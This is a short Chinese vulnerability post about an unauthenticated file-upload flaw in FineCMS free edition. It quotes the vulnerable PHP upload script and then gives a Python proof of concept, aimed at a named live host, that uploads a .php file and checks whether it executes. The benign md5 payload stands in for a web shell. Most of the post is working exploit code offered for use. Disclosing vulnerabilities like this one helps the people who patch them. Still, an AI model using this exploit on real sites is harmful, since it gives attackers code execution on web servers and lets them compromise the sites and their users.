FIneCMS免费版无条件getshell

  • A+
所属分类:漏洞时代
摘要

路径:dayrui/libraries/Chart/ofc_upload_image.php无任何限制,可以直接上传。。poc:

路径:dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';  if (!file_exists($default_path)) mkdir($default_path, 0777, true);  $destination = $default_path . basename( $_GET[ 'name' ] );   echo 'Saving your image to: '. $destination;  $jfh = fopen($destination, 'w') or die("can't open file"); fwrite($jfh, $HTTP_RAW_POST_DATA); fclose($jfh);

无任何限制,可以直接上传。。

poc:

#!/usr/bin/env python  # -*- coding: utf-8 -*-  #__author__ = '1c3z'    import urllib2  import random    fileName = "shell" + str(random.randrange(1000,9999)) + ".php"  target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php"  def uploadShell():      url = target + "?name=" + fileName      req = urllib2.Request(url, headers={"Content-Type": "application/oct"})       res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")      return res.read()    def poc():      res = uploadShell()      if res.find("tmp-upload-images") == -1:          print "Failed !"          return        print "upload Shell success"      url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName      md5 = urllib2.urlopen(url).read()      if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:          print "poc: " + url    poc()

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: